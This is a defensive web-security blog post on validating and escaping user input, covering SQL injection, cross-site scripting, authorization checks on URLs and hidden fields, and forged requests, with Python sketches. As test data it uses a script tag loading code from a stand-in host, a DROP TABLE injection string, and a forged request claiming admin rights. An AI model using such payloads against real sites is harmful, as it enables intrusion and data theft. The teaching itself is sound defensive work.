Sanitizing Input Strings

Preventing Problematic Output

Seeing and Doing Things They Shouldn't

<input type="hidden"> Isn't Hidden

Other Inputs That Can Be Modified

massmind - Get Together - Never trust user input

Never trust user input

One of the most common security issues I see in code from new web developers (and even some experienced ones) is not sanitizing user input. They assume that input always comes from a non-adversarial user interacting with the site through a web browser. Nothing in the HTTP(S) protocol guarantees this. There are lots of ways a mischievous person can send data to your website, either by going through the browser or by not using a browser at all. Even users who are not trying to be malicious can cause you trouble.

Most developers are aware of SQL injection attacks and know how important it is to sanitize input strings such as names, email addresses and any other content. (xkcd has a very funny cartoon about such exploits.) Steve Friedl has a good article on how attackers find such holes in your applications. It's critical for web application security that you make sure inputs are properly escaped before using them in database queries. Perhaps in a future post I'll talk about some strategies for doing that more effectively. And remember that you must sanitize all input, not just strings. Sure, you have a <select> list to allow the user to pick which type of pizza they want and you've given them numbers (1 = cheese, 2 = sausage, 3 = veggie combo, etc.), but that doesn't stop someone from sending you a request where the pizza type is a string containing instructions to change the admin email address to their own.
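As a rough illustration of the pizza example, here is a minimal Python sketch using the standard sqlite3 module. The table, the `PIZZA_TYPES` menu and the function names are all hypothetical. Note that it uses bound query parameters rather than manual escaping, which is a substitution on my part and not necessarily the strategy the post has in mind.

```python
import sqlite3

# Hypothetical menu: the ids the <select> list is supposed to send.
PIZZA_TYPES = {1: "cheese", 2: "sausage", 3: "veggie combo"}


def parse_pizza_type(raw):
    """Return a valid pizza id, or raise ValueError for anything else."""
    try:
        pizza_id = int(raw)
    except (TypeError, ValueError):
        raise ValueError("pizza type must be an integer") from None
    if pizza_id not in PIZZA_TYPES:
        raise ValueError("unknown pizza type")
    return pizza_id


def save_order(conn, customer_name, raw_pizza_type):
    """Validate the pizza type, then insert using bound parameters."""
    pizza_id = parse_pizza_type(raw_pizza_type)
    # The ? placeholders pass the values as data; they are never
    # spliced into the SQL text itself.
    conn.execute(
        "INSERT INTO orders (customer_name, pizza_type) VALUES (?, ?)",
        (customer_name, pizza_id),
    )


# Hypothetical in-memory database, just for the demonstration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (customer_name TEXT, pizza_type INTEGER)")
save_order(conn, "Robert'); DROP TABLE orders;--", "2")
```

The hostile-looking name is stored as an ordinary string, while a pizza type that is not one of the known numbers is rejected before it ever reaches the database.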

But SQL injection is not the only reason to sanitize user input. What happens to your application if a user can put HTML in their user name and that user name is displayed to other users? It doesn't take much for an enterprising user to include in their user name a <script> tag that loads a malicious JavaScript file on the machine of everyone who looks at a page showing that user name. That's why it's very important to filter such data out and/or make sure you turn characters such as <, > and & into their HTML entities. Bugs here usually result in cross-site scripting exploits. In general, you want to be careful about any data you send back to a user that you've received from a user.
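A small sketch of the entity conversion, using Python's standard `html.escape`. The `render_user_name` helper and the surrounding `<span>` markup are made up for illustration; a real application would more likely rely on a template engine that escapes by default.

```python
import html


def render_user_name(user_name):
    """Return an HTML fragment with the user name safely escaped."""
    # html.escape converts &, <, > and (by default) both quote characters
    # into entities, so the browser shows the text instead of running it.
    return '<span class="user-name">' + html.escape(user_name) + "</span>"


hostile_name = '<script src="//evil.example/x.js"></script>'
fragment = render_user_name(hostile_name)
```

The important design point is to escape at output time, every time, regardless of how carefully the value was checked when it was first stored.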

It's also possible for malicious users to craft URLs that aren't designed to take the site down, but to view data that they shouldn't have access to. For example, let's say you have a website running a content management system. You should never assume that just because no page visible to a non-registered user links to item #345, some enterprising user (or even an enterprising web search crawler) can't find that page. One web application I'm aware of had a problem with its team-based private chat (which has since been fixed). Nothing checked that the user was actually on the team whose chat stream they were requesting. So anyone could read the "team-only" chat if they just created the right URL with the right team number (and the team numbers were easy to find on the game page).
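The missing check in the team chat story could look something like the following sketch. The data structures, the `Forbidden` exception and `get_team_chat` are all hypothetical stand-ins; the point is only that membership is verified on the server for every request, no matter how the URL was obtained.

```python
# Hypothetical in-memory data standing in for a real database.
TEAM_MEMBERS = {7: {"alice", "bob"}, 8: {"carol"}}
CHAT_LOG = {7: ["meet at noon"], 8: ["secret plan"]}


class Forbidden(Exception):
    """Raised when a user asks for data they are not entitled to see."""


def get_team_chat(current_user, team_id):
    """Return the chat for team_id only if current_user is on that team."""
    # The team number comes from the URL, so it is user input:
    # check membership instead of assuming the link was legitimate.
    if current_user not in TEAM_MEMBERS.get(team_id, set()):
        raise Forbidden("not a member of this team")
    return CHAT_LOG.get(team_id, [])
```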

An even more subtle issue that we've encountered is making sure users can't set an option they don't have the privilege to set. For example, let's say you have a checkbox for "Is Administrator" when creating a new user, and you don't show that checkbox if the user creating or editing the account is not an administrator themselves. But what happens if a normal user adds that value to their request? Do you still save that value as the "Is Administrator" flag? Arguing that "Oh, no one will figure out the name of that checkbox" is just security through obscurity. Someone may eventually find that hole.
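One way to close that hole, sketched in Python under the assumption that submitted form fields arrive as a dictionary of strings and that a ticked checkbox sends the value "on". The `User` class, field names and `create_user` function are invented for this example.

```python
from dataclasses import dataclass


@dataclass
class User:
    name: str
    is_admin: bool = False


def create_user(acting_user, form):
    """Build a new user from submitted form fields (a dict of strings)."""
    new_user = User(name=str(form.get("name", "")))
    # Hiding the checkbox is not enough: honor the flag only when the
    # person making the request is an administrator themselves.
    if acting_user.is_admin:
        new_user.is_admin = form.get("is_admin") == "on"
    return new_user
```

With this in place, a normal user who adds `is_admin=on` to their request simply has the field ignored.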

A related issue is using hidden <input> elements to store data. Remember that these are visible to the user and can also be tampered with by anyone who wants to create their own HTTP request. So don't trust them when they come back. For example, if you store the id number of the item being edited, then when the request comes back to save that item, validate that the user has the authority to edit the item number referenced in the request, so they can't simply switch to a different id. If they do have authority, then even if they've changed the id, they aren't doing anything they don't already have the privileges to do.
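Here is a sketch of that validation on the save request. The `ITEMS` store, the `item_id` field name and the owner-based permission rule are assumptions made for the example; your own rules for who may edit what will differ.

```python
# Hypothetical item store; "owner" decides who may edit an item.
ITEMS = {
    101: {"owner": "alice", "title": "Draft"},
    102: {"owner": "bob", "title": "Budget"},
}


def save_item(current_user, form):
    """Apply an edit, re-checking the id that came back in the hidden field."""
    try:
        item_id = int(form["item_id"])
    except (KeyError, TypeError, ValueError):
        raise ValueError("missing or malformed item id") from None
    item = ITEMS.get(item_id)
    # Check authority against the id in THIS request, not the id that
    # was originally written into the form.
    if item is None or item["owner"] != current_user:
        raise PermissionError("not allowed to edit this item")
    item["title"] = str(form.get("title", item["title"]))
    return item
```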

There are other inputs to your web application that also count as "user input" and that you need to be aware of. Things like request variables, which you may feel are only ever set by browsers, can be hand-crafted by a malicious program.
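To show how little effort hand-crafting takes, this sketch builds (but does not send) a request with Python's standard urllib. I am assuming here that "request variables" covers things like headers, cookies and form fields; the URL and all the values are made up.

```python
from urllib.parse import urlencode
from urllib.request import Request


def build_forged_request():
    """Construct a POST request without any browser involved."""
    # Form fields, including ones the real page never offered.
    body = urlencode({"item_id": "102", "is_admin": "on"}).encode("ascii")
    return Request(
        "https://example.com/save",  # hypothetical endpoint
        data=body,
        headers={
            # Every one of these is just a string the sender chooses.
            "User-Agent": "Mozilla/5.0 (definitely a browser)",
            "Referer": "https://example.com/edit?item_id=101",
            "Cookie": "role=admin",
        },
        method="POST",
    )


forged = build_forged_request()
```

Nothing on the server side can tell from these values alone whether a real browser produced them, so they deserve the same suspicion as any other input.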

So, make sure you are careful about all the inputs that are coming into your web application. There certainly are malicious people out there, trying to cause trouble.

October 2024